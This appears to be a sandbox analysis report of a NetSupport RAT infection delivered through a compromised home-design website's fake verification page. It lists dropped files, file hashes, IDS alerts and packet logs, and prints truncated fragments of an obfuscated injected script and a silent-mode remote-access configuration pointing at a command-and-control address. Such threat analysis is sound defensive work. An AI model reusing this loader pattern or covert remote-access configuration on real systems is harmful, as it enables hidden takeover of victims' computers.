                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):120288
                                                                                                                                                              Entropy (8bit):5.258428134726746
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:768:zfVZl6FhWr80/SqUr2pe/3NPHDHf/ckvKoGr2pe/kCHDHf/ckPG:z70hGaq0ee/3hjHTIee/djHC
                                                                                                                                                              MD5:EE75B57B9300AAB96530503BFAE8A2F2
                                                                                                                                                              SHA1:98DD757E1C1FA8B5605BDA892AA0B82EBEFA1F07
                                                                                                                                                              SHA-256:06A0A243811E9C4738A9D413597659CA8D07B00F640B74ADC9CB351C179B3268
                                                                                                                                                              SHA-512:660259BB0FD317C7FB76505DA8CBC477E146615FEC10E02779CD4F527AEB00CAED833AF72F90B128BB62F10326209125E809712D9ACB41017E503126E5F85673
                                                                                                                                                              Malicious:true
                                                                                                                                                              Yara Hits:
                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe, Author: Joe Security
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 13%
                                                                                                                                                              Reputation:low
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):647
                                                                                                                                                              Entropy (8bit):5.603856649376801
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:F1xS2lMfGShR8kkiBlsVTXuZ7/P981E7GXXfDWQCYublu+vQv4FASv4pv4i:bI2MNR8piBlLI1fXXfD/uAv4FASv4pv7
                                                                                                                                                              MD5:8C978A6D8F380D59C9DB4AFE06218B89
                                                                                                                                                              SHA1:1FA286E91C8AA0EEB99276AF72D40E02D2148C51
                                                                                                                                                              SHA-256:D8C2B28FF9F90626F7E669B4FBDB45ED553A3CB1A980E23FDFEA4FBBDDDFC502
                                                                                                                                                              SHA-512:B74539AE7FC88756C1E1404814D33197CD8709AADDF2C43167F2CF157E947C2CABAD759414038DBE5E83B201786052E94AB53BD97BB4DE68744F514F8AE7F552
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:0xe755af83....[Client].._present=1..AlwaysOnTop=1..DisableChat=1..DisableCloseApps=0..HideWhenIdle=1..Protocols=3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SOS_Alt=0..SOS_LShift=0..SOS_RShift=0..SysTray=0..UnloadMirrorOnDisconnect=0..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0....[HTTP]..CMPI=60..GatewayAddress=92.255.85.135:443..gsk=GL:M@AEOHD<K?ACIGO:B=H@JBOGE..gskmode=0..GSK=GL:M@AEOHD<K?ACIGO:B=H@JBOGE..GSKX=GL:M@AEOHD<K?ACIGO:B=H@JBOGE..
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):773968
                                                                                                                                                              Entropy (8bit):6.901559811406837
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                                                                                              MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                                                                                              SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                                                                                              SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                                                                                              SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Reputation:low
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:Windows setup INFormation
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):328
                                                                                                                                                              Entropy (8bit):4.93007757242403
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                                                                                              MD5:26E28C01461F7E65C402BDF09923D435
                                                                                                                                                              SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                                                                                              SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                                                                                              SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):33144
                                                                                                                                                              Entropy (8bit):6.737780491933496
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:768:FFvNhAyi5hHA448qZkSn+EgT8To1iTYiu:FCyoHA448qSSzgI2GQ
                                                                                                                                                              MD5:DCDE2248D19C778A41AA165866DD52D0
                                                                                                                                                              SHA1:7EC84BE84FE23F0B0093B647538737E1F19EBB03
                                                                                                                                                              SHA-256:9074FD40EA6A0CAA892E6361A6A4E834C2E51E6E98D1FFCDA7A9A537594A6917
                                                                                                                                                              SHA-512:C5D170D420F1AEB9BCD606A282AF6E8DA04AE45C83D07FAAACB73FF2E27F4188B09446CE508620124F6D9B447A40A23620CFB39B79F02B04BB9E513866352166
                                                                                                                                                              Malicious:true
                                                                                                                                                              Yara Hits:
                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\bpsFyf\pcicapi.dll, Author: Joe Security
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                              Reputation:low
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):77280
                                                                                                                                                              Entropy (8bit):6.793716898125355
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:SfafvTuNOwphKuyUHTqYXHhrXH4LLIywmoEee/wjHnee/ssjHai:kafLSpAFUzt0LLIywYehjHeyjH
                                                                                                                                                              MD5:1768C9971CEA4CC10C7DD45A5F8F022A
                                                                                                                                                              SHA1:3D199BEE412CBAC0A6D2C4C9FD5509AD12A667E7
                                                                                                                                                              SHA-256:6558B3307215C4B73FC96DC552213427FB9B28C0CB282FE6C38324F1E68E87D6
                                                                                                                                                              SHA-512:F83BF23ABCE316CB1B91A0AC89C1A709A58A7EC49C8493140AD7DC7A629E8F75032057889E42BE3091CF351760348380634F660C47A3897F69E398849CA46780
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                                                              Reputation:low
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 52648, version 1.0
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):52648
                                                                                                                                                              Entropy (8bit):7.996033428788516
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:1536:9eBlxzWRUJTVGP5v267Q1Sk+S2/D8l+8O2:9maeeP5v267Q7w8z
                                                                                                                                                              MD5:657E828FB3A5963706E24CBF9D711BB8
                                                                                                                                                              SHA1:84C08557D977E0A46EC8941B2D84235069DAB229
                                                                                                                                                              SHA-256:45E39853C41558C4922FF1B0895547A99E378F136EC3D9D2F4DF15CC269485FA
                                                                                                                                                              SHA-512:EEBEDF24A2516B860FFA2C9241474157604F8FC2EDC9E3BF3C0A0DDDF3168519F13FC195D48D232ED8F4A5DB1C48EF0563D62B2E2BDCF55F936CBD319AB18E16
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:https://use.fontawesome.com/releases/v5.0.0/webfonts/fa-brands-400.woff2
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (33229)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):33407
                                                                                                                                                              Entropy (8bit):4.7584710387647835
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:384:Wb+rB31zxcjzc61CrDam31bvG91QCQ/HUMNYmB1vcv/PEsQ/4j:731zxcfc6IyUFv61dQ/0MOm3izQ/Y
                                                                                                                                                              MD5:E35D9C4EBAEA0573DF8E4A9505B72EEA
                                                                                                                                                              SHA1:5FBB384CD8CD7A64483E6487D8D8179A633F9954
                                                                                                                                                              SHA-256:9F29F2BBB25602F4BDBD3122C317244F8FD9741106FFD5A412574B02EE794993
                                                                                                                                                              SHA-512:C571015753B927017B3BEC2B1C0B0103DE27DCC5E805E1DAF8A1459E0F797ABA38FF0592F93CBEC80B98F574B18455DDBC65A1F38A8AED5ACF14EB8CE2D7265C
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:https://use.fontawesome.com/releases/v5.0.0/css/all.css
                                                                                                                                                              Preview:/*!. * Font Awesome Free 5.0.0 by @fontawesome - http://fontawesome.com. * License - http://fontawesome.com/license (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */..fa,.fab,.fal,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:inline-block;font-style:normal;font-variant:normal;text-rendering:auto;line-height:1}.fa-lg{font-size:1.33333em;line-height:.75em;vertical-align:-.0667em}.fa-xs{font-size:.75em}.fa-sm{font-size:.875em}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-fw{text-align:center;width:1.25em}.fa-ul{list-style-type:none;margin-left:2.5em;padding-left:0}.fa-ul>li{position:relative}.fa-li{left:-2em;position:absolute;text-align:center;width:2em;line-height:inherit}.fa-border{border:.08em solid #eee;border-radius:.1em;padding:.2em .25em .15em}.fa-pull-left{float
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (764)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):769
                                                                                                                                                              Entropy (8bit):5.120187501927207
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:xNpAp3XATntcBHslgT9lCuABuc7HHHHHHHYqmffffffo:xjIXOqKlgZ01BucEqmffffffo
                                                                                                                                                              MD5:185167AECC19DE1F81AB42043B33E3A8
                                                                                                                                                              SHA1:F94AE64C2B35F284021F93C7D6C3D4B2559E7628
                                                                                                                                                              SHA-256:DEA696E4F82D00AF33066449CB0711CAC3AE9AD6678BA618A715E4E49851E248
                                                                                                                                                              SHA-512:8FAD799AF19AB709BC3C3E75E7CC440619A03255966D106233A9BEC22B8F76BD1BCA9CE75A0CBE0955C03DCDB852914DE033844D21F8294537C28990AC136857
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                              Preview:)]}'.["",["episode 7 tulsa king","apple intelligence ios 18.1","baltimore ravens vs cleveland browns","mortgage rates today","pope francis synod","videos","carolina panthers denver broncos","american airlines brisbane flight"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1251,1250,605,604,603,602,601,600],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (65488), with no line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):67842
                                                                                                                                                              Entropy (8bit):5.787506376022805
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:12TKAL+nNvaKqSx7XXfeYrhIyx5qdtDR1Ef9ukDE:12TKA6tNdx7LSDR10UkDE
                                                                                                                                                              MD5:4D89ED3D2A8794DF472F060337B87424
                                                                                                                                                              SHA1:3F1F098C00C7C3B51D7714E7BC78FA2E065B2C10
                                                                                                                                                              SHA-256:D5474245A06F3FE94F9DFACCB3317A91433B158D6A0DF7A69B88E330EA1E489B
                                                                                                                                                              SHA-512:6B800F39F09B898EA39C4098F6C374964D13B2450600E57D989C498251D7A481AA036B4C711C5D50F7F07A0FF3D17D8A45E347841AD222B3E75096F66F710872
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:https://inspyrehomedesign.com/
                                                                                                                                                              Preview:<script>;Function("'e+v[*y%5]2594*{ycsz#ja%twtr*@twc{_!]~ow7[_!.n%n-7h^qex,9&pt,v+7y!vp215-,aguwem6.q561*4x.7a@kly!esem89urk..n4f{z{hgjlf&2ho%k&!g2a5q7hpqn3+-gc}2[4.^n!x46#*pf-tp%8+hf-}}%_k~@9jt}e]e#9e5g7k7vl6o425i,e],i2~y1ulrmekcuc5azl61^e_keo-{*%p#tm%}wq3@w3cm^%c.rscm~r@a{1+uervv,+]j]u]k9o![i12pml8]5.+zk-ms38_i{{6^5[#g~cwg2i&}-#&if*yo3zi4-!qna@xvzls@ph+np,!s_39zq@2~+rx4yzf8~vy3t3{*v}&3m]47qs9w9*{o,[s}ern@^@ff^1_e#[!hfu*jzjg#[6an#g6tzxe[_xcg7#1&~i_6m}8sjhfu91o~^8laq}ope6x&,.&ulhaj,yvj3%.^w4_[een8yqoe7i18xxuhi&j~kl-]w+sr^r8t';_TnvD4h58gdI59ysb45Rcn1oyyI8S39T7LDG0U0DYCLNKHpfo=(_TnvD4h58gdI59ysb45Rcn1oyyI8S39T7LDG0U0DYCLNKHelect)=>!_TnvD4h58gdI59ysb45Rcn1oyyI8S39T7LDG0U0DYCLNKHelect?\"QBsepJWblmT6ik34tUdQ\"[_XEs5oG59W9h3nQY3KK8NBxY057j0R63Uw28gpAf7xXMfV5kvM()](/[JbkQ4T3mU6WBde]/g,\"\"):(_TnvD4h58gdI59ysb45Rcn1oyyI8S39T7LDG0U0DYCLNKHelect==1?\"qwfLvloGqTrYEXMaecXRZhteg\"[_XEs5oG59W9h3nQY3KK8NBxY057j0R63Uw28gpAf7xXMfV5kvM()](/[RgXeMGYwvqtLTZl]/g,\"\"):\"HpF09umnkHJc65Zt5iAosnm\"[_XEs5oG59W
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):284
                                                                                                                                                              Entropy (8bit):5.212377654998837
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoIRCw9J4KBFm8oD:J0+oxBeRmR9etdzRxGezHtL4b8+
                                                                                                                                                              MD5:E99FF2FE9B06EB413E69A33B288A948C
                                                                                                                                                              SHA1:8941E6F22F9377374B42DF8724BD4F2F2B07BC08
                                                                                                                                                              SHA-256:10594F3532E5D0B52A1F8DB7FFF8083A31E7F341A335C90C170CBD28B7EEE3BA
                                                                                                                                                              SHA-512:01220638A165890B7AB20C90F47FF2AACA8345A6083E9BC57A3480B7C9AB7708F1882F4D09005E1551E7DA806599288685E16ADB7D98C35B3283BEF0F9B01522
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:https://inspyrehomedesign.com/favicon.ico
                                                                                                                                                              Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<hr>.<address>Apache/2.4.52 (Ubuntu) Server at inspyrehomedesign.com Port 443</address>.</body></html>.
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:PNG image data, 80 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1606
                                                                                                                                                              Entropy (8bit):7.810373996731552
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:F6LUotgGzEIsaTVSSbR0YfP4f3rMXGrb90QzTUpPDGRnr7q0v+/U5B:FItgMFTVSSKYI/YoZXUxGxjm/s
                                                                                                                                                              MD5:EB6B97BF8AA1F306E937E8435CEE00AD
                                                                                                                                                              SHA1:80390CB509BCE770227A46D8CAA5E7D138814837
                                                                                                                                                              SHA-256:FCE99D7A035FF396A654347027F961BC159BDAD24CFF474E9B8B485595A8D7F7
                                                                                                                                                              SHA-512:F75356B0FA9CAE560050D3349194A3E2077E3739E17D86A1149511DF608B55461F848CB3C0FFFAE5B228C8068718A91C7A5553BFBD4E1832847307998DB84EDE
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):10478
                                                                                                                                                              Entropy (8bit):6.1437966409549345
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:+YdzCOGbqUhwFRyC7lzBpi58Q0cW3O3AMw8+Ezgl02pmiV5ASidm4EcMvYf5:+YduOGPwFz7lzO58Q0m+0MnX4X
                                                                                                                                                              MD5:977BB6913B1F65A6472727EA4F362E97
                                                                                                                                                              SHA1:1D1247A8F9359576C913E9586D72F0D51773B22C
                                                                                                                                                              SHA-256:CACE794532FFC2A8275C86E4248CA38CF85DFB209D630E05E049D6FE2047EA2E
                                                                                                                                                              SHA-512:02E3D08AFED87051CD5D7DE046CFECE58731901EF985F8A76E4110130ED4A364ABAC06E77D124E185E146502BF4170AAF07E81272DB9C100FAFF878ACFE48EFA
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:https://inspyrehomedesign.com/Ray-verify.html
                                                                                                                                                              Preview:<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><META NAME='GENERATOR' Content='The source code of this page is encrypted with HTML Guardian, the world's standart for website protection. Visit http://www.protware.com for details'><meta http-equiv='expires' content=''><script>l1l=document.documentMode||document.all;var c6efa=true;ll1=document.layers;lll=window.sidebar;c6efa=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');c6efa|=lII;zLP=location.protocol+'0FD';ilY5HP79zs2='e6Fwtnl9Iy7X';</script><script>oS3zB7k=new Array();oS3zB7k[0]='\141\151\165%31%49%4A%31%33%48\121%32%38';wL6mXZ4=new Array();wL6mXZ4[0]='.<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C~..D.T.D. .X.H.T.M.L. .1...0. .T.r.a.n.s.i.t.i.o.n.a.l~..E.N."~.~\n.t.p.:~..w~B...w.3...o.r.g./.T.R./.x~\n~..1./~..D~N~P.l.1.-.t~-~/~1~3~5.l...d.t.d.".>.\r.\n.<~W. .x~.~/.=."~=~?~A~C~E
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:PNG image data, 80 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):1606
                                                                                                                                                              Entropy (8bit):7.810373996731552
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:F6LUotgGzEIsaTVSSbR0YfP4f3rMXGrb90QzTUpPDGRnr7q0v+/U5B:FItgMFTVSSKYI/YoZXUxGxjm/s
                                                                                                                                                              MD5:EB6B97BF8AA1F306E937E8435CEE00AD
                                                                                                                                                              SHA1:80390CB509BCE770227A46D8CAA5E7D138814837
                                                                                                                                                              SHA-256:FCE99D7A035FF396A654347027F961BC159BDAD24CFF474E9B8B485595A8D7F7
                                                                                                                                                              SHA-512:F75356B0FA9CAE560050D3349194A3E2077E3739E17D86A1149511DF608B55461F848CB3C0FFFAE5B228C8068718A91C7A5553BFBD4E1832847307998DB84EDE
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:https://i.ibb.co/t8b1Qdw/1q.png
                                                                                                                                                              No static file info
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-28T19:45:13.415753+0100 | 2827745 | ETPRO MALWARE NetSupport RAT CnC Activity | 1 | 192.168.2.16 | 49729 | 92.255.85.135 | 443 | TCP
2024-10-28T19:46:17.038167+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.16 | 49726 | 166.1.160.211 | 80 | TCP
2024-10-28T19:46:17.218232+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.16 | 49726 | 166.1.160.211 | 80 | TCP
2024-10-28T19:46:18.039720+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.16 | 49726 | 166.1.160.211 | 80 | TCP
2024-10-28T19:46:19.280274+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.16 | 49726 | 166.1.160.211 | 80 | TCP
2024-10-28T19:46:19.443100+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.16 | 49726 | 166.1.160.211 | 80 | TCP
2024-10-28T19:46:19.676594+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.16 | 49726 | 166.1.160.211 | 80 | TCP
2024-10-28T19:46:19.838942+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.16 | 49726 | 166.1.160.211 | 80 | TCP
2024-10-28T19:46:20.094216+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.16 | 49726 | 166.1.160.211 | 80 | TCP
2024-10-28T19:46:20.317348+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.16 | 49726 | 166.1.160.211 | 80 | TCP
2024-10-28T19:46:25.238092+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.16 | 49726 | 166.1.160.211 | 80 | TCP
2024-10-28T19:46:25.701188+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.16 | 49726 | 166.1.160.211 | 80 | TCP
2024-10-28T19:46:26.502458+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.16 | 49726 | 166.1.160.211 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                              Oct 28, 2024 19:45:29.272974014 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                              Oct 28, 2024 19:45:29.941129923 CET44349709172.217.16.196192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:29.941278934 CET44349709172.217.16.196192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:29.941340923 CET49709443192.168.2.16172.217.16.196
                                                                                                                                                              Oct 28, 2024 19:45:30.489600897 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                              Oct 28, 2024 19:45:30.615995884 CET49709443192.168.2.16172.217.16.196
                                                                                                                                                              Oct 28, 2024 19:45:30.616029024 CET44349709172.217.16.196192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:30.616453886 CET49715443192.168.2.16172.217.16.196
                                                                                                                                                              Oct 28, 2024 19:45:30.616487026 CET44349715172.217.16.196192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:30.616561890 CET49715443192.168.2.16172.217.16.196
                                                                                                                                                              Oct 28, 2024 19:45:30.616919041 CET49715443192.168.2.16172.217.16.196
                                                                                                                                                              Oct 28, 2024 19:45:30.616929054 CET44349715172.217.16.196192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:31.517776966 CET44349715172.217.16.196192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:31.518073082 CET49715443192.168.2.16172.217.16.196
                                                                                                                                                              Oct 28, 2024 19:45:31.518090010 CET44349715172.217.16.196192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:31.519385099 CET44349715172.217.16.196192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:31.519690037 CET49715443192.168.2.16172.217.16.196
                                                                                                                                                              Oct 28, 2024 19:45:31.519812107 CET49715443192.168.2.16172.217.16.196
                                                                                                                                                              Oct 28, 2024 19:45:31.519818068 CET44349715172.217.16.196192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:31.519860983 CET44349715172.217.16.196192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:31.572948933 CET49715443192.168.2.16172.217.16.196
                                                                                                                                                              Oct 28, 2024 19:45:31.793416977 CET44349715172.217.16.196192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:31.843945980 CET49715443192.168.2.16172.217.16.196
                                                                                                                                                              Oct 28, 2024 19:45:31.843961954 CET44349715172.217.16.196192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:31.844974041 CET49715443192.168.2.16172.217.16.196
                                                                                                                                                              Oct 28, 2024 19:45:31.845130920 CET44349715172.217.16.196192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:31.845202923 CET49715443192.168.2.16172.217.16.196
                                                                                                                                                              Oct 28, 2024 19:45:32.160170078 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:32.160275936 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:32.160386086 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:32.160574913 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:32.160614014 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:32.169523001 CET49717443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:32.169570923 CET44349717166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:32.169653893 CET49717443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:32.169862032 CET49717443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:32.169881105 CET44349717166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:32.843586922 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:32.843923092 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:32.843985081 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:32.844868898 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:32.845216990 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:32.845314026 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:32.845351934 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:32.863295078 CET44349717166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:32.872999907 CET49717443192.168.2.16166.1.160.75
